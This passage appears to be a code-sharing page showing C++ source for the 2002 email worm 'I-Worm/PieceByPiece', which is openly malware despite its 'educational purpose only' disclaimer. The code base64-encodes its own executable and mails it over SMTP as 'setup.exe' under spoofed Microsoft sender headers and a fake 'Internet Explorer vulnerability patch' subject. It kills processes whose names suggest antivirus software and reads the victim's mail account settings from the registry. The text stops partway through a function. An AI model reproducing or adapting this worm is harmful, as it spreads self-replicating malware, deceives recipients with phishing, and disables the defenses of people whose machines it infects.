?? 29a-7.014
字號:
/*
I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc.
For educational purpose only. Distribute under GPL.
Some lyrics from the song that inspired me:
"Cause nothing ever lasts forever
We're like flowers in this vase, together
You and me, it's pulling me down
Tearing my down, piece by piece
And you can't see
That's it's like a disease
Killing me now, it's so hard to breathe"
-Feeder <Piece by Piece>
*/
#include <winsock.h>
#include <fstream.h>
#include <tlhelp32.h>
#include <string.h>
#include <stdlib.h>
//--------------------------------------GLOBAL VARIABLES-------------------------------------
HWND hwnd;
WORD version = MAKEWORD(1,1);
WSADATA wsaData;
int nRet;
char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com";
char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH];
char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256];
SOCKET theSocket;
int i,err=0,c=0,connected=0,tim,sending=0;
SYSTEMTIME time;
double k;
DWORD basesize,ProcessId;
//--------------------------------------WNDPROC-----------------------------------------------
LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam);
//--------------------------------------GETASC------------------------------------------------
int getasc(char chr[1]) {
int i=0;
char c[1];
for (i=0;i<257;i++) {
c[0]=i;
if (chr[0]==c[0]) { return(i); }
}
}
//--------------------------------------BASE64-----------------------------------------------
void base64(char *file) { //Encodes a file using the "base 64" encoding
WIN32_FIND_DATA fis; //It's kinna shitty code, but it works just GREAT!
int i,j,n,done=0,k=0,lin=0;
double c=0;
char tmp[7];
DWORD totsize;
char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'};
fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out);
FindFirstFile(file,&fis);
totsize=fis.nFileSizeLow; //Get the file size in bytes
for (c=0;c<totsize/3;c++) { //Encode 'till no more 3 char chunks are available
buc1[0]=0;
xxx[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
buc2[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc2[i]='0';
buc2[i]=0;
strcat(buc2,cx2);
} else strcpy(buc2,cx2);
buc3[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc3[i]='0';
buc3[i]=0;
strcat(buc3,cx2);
} else strcpy(buc3,cx2);
xxx[0]=0;
strcpy(xxx,buc1);
done=0;
k=0;
while (done!=24) {
for (i=done;i<done+6;i++) {
tmp[k]=xxx[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
}
//One char left so add 4 0s at the end
if (totsize%3==1) {
buc1[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
strcat(buc1,"0000");
done=0;
k=0;
while (done!=12) {
for (i=done;i<done+6;i++) {
tmp[k]=buc1[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
g<<"==";
}
//Two chars left so add 2 0s at the end
if (totsize%3==2) {
buc1[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
strcat(buc1,"00");
done=0;
k=0;
while (done!=18) {
for (i=done;i<done+6;i++) {
tmp[k]=buc1[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
g<<"=";
}
f.close();
g.close();
//Get the size of the encoded file
FindFirstFile("C:\\Msbootlog.sys",&fis);
basesize=fis.nFileSizeLow;
}
//--------------------------------------SENDMAIL---------------------------------------------
void sendmail() { //Sends an e-mail with MIME encoding
int ran;
sending=1;
//"HELO" the server
strcpy(myBuf, "HELO <");
strcat(myBuf,helo);
strcat(myBuf,">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') {
strcpy(myBuf, "MAIL FROM:<");
strcat(myBuf,email);
strcat(myBuf,">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) {
GetSystemTime(&time);
srand(time.wSecond);
ran=rand();
while (ran>c) {
srand(c);
ran=ran-rand();
}
if (ran<0) ran=ran*(-1);
strcpy(myBuf, "RCPT TO:<");
strcat(myBuf, emails[ran]);
strcat(myBuf, ">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='5' && err==0) {
strcpy(myBuf, "DATA\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) {
if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address
strcpy(myBuf, "Reply-To: \"Microsoft\" <microsoft@microsoft.com>\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "From: \"Microsoft\" <information@microsoft.com>\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
} else { //if we find a new address
strcpy(myBuf, "From: <");
strcat(myBuf, email);
strcat(myBuf, ">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Subject: Hello\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
}
strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " boundary = \"bla\"\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X-Priority: 3\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "--bla\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "--bla\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " name = \"setup.exe\"\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " filename = \"setup.exe\"\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
//Send the file byte by byte
fstream f("C:\\Msbootlog.sys",ios::in);
for (k=0;k<basesize;k++) {
f.get(ch[1]);
strcpy(myBuf,&ch[1]);
send(theSocket,myBuf,strlen(myBuf),0);
}
f.close();
strcpy(myBuf, "\x0d\x0a--bla--\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "\x0d\x0a.\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
strcpy(myBuf, "QUIT\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
}
//--------------------------------------GETPROCESSMODULE------------------------------------
BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID,
LPMODULEENTRY32 lpMe32, DWORD cbMe32)
{
BOOL bRet = FALSE;
BOOL bFound = FALSE;
HANDLE hModuleSnap = NULL;
MODULEENTRY32 me32 = {0};
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID);
if (hModuleSnap == (HANDLE)-1)
return (FALSE);
me32.dwSize = sizeof(MODULEENTRY32);
if (Module32First(hModuleSnap, &me32))
{
do
{
if (me32.th32ModuleID == dwModuleID)
{
CopyMemory (lpMe32, &me32, cbMe32);
bFound = TRUE;
}
}
while (!bFound && Module32Next(hModuleSnap, &me32));
bRet = bFound;
}
else
bRet = FALSE;
CloseHandle (hModuleSnap);
return (bRet);
}
//--------------------------------------PROCESSES---------------------------------------------
BOOL processes() //Various stuff with processes
{
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
DWORD dwPriorityClass;
BOOL bGotModule = FALSE;
MODULEENTRY32 me32 = {0};
do
{
bGotModule = GetProcessModule(pe32.th32ProcessID,
pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32));
if (bGotModule)
{
HANDLE hProcess;
hProcess = OpenProcess (PROCESS_ALL_ACCESS,
FALSE, pe32.th32ProcessID);
dwPriorityClass = GetPriorityClass (hProcess);
//Get the virus' filename
if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath);
//Anti AVs
if (strstr(me32.szModule,"AV")!=0 || strstr(me32.szModule,"F-")!=0 || strstr(me32.szModule,"av")!=0) {
TerminateProcess(hProcess,0);
}
//Close the handle
CloseHandle (hProcess);
}
}
while (Process32Next(hProcessSnap, &pe32));
bRet = TRUE;
}
else
bRet = FALSE;
CloseHandle (hProcessSnap);
return (bRet);
}
//--------------------------------------FINDSERVER--------------------------------------------
void findserver() { //Gets a SMTP server and user name from the registry (if possible)
int i,j;
char key2[256];
unsigned char acc[1024],smtp[1024],eml[1024];
DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml);
HKEY hKey;
//Try getting a SMTP server from registry
strcpy(key2,"Software\\Microsoft\\Internet Account Manager");
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen);
RegCloseKey(hKey);
strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\");
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -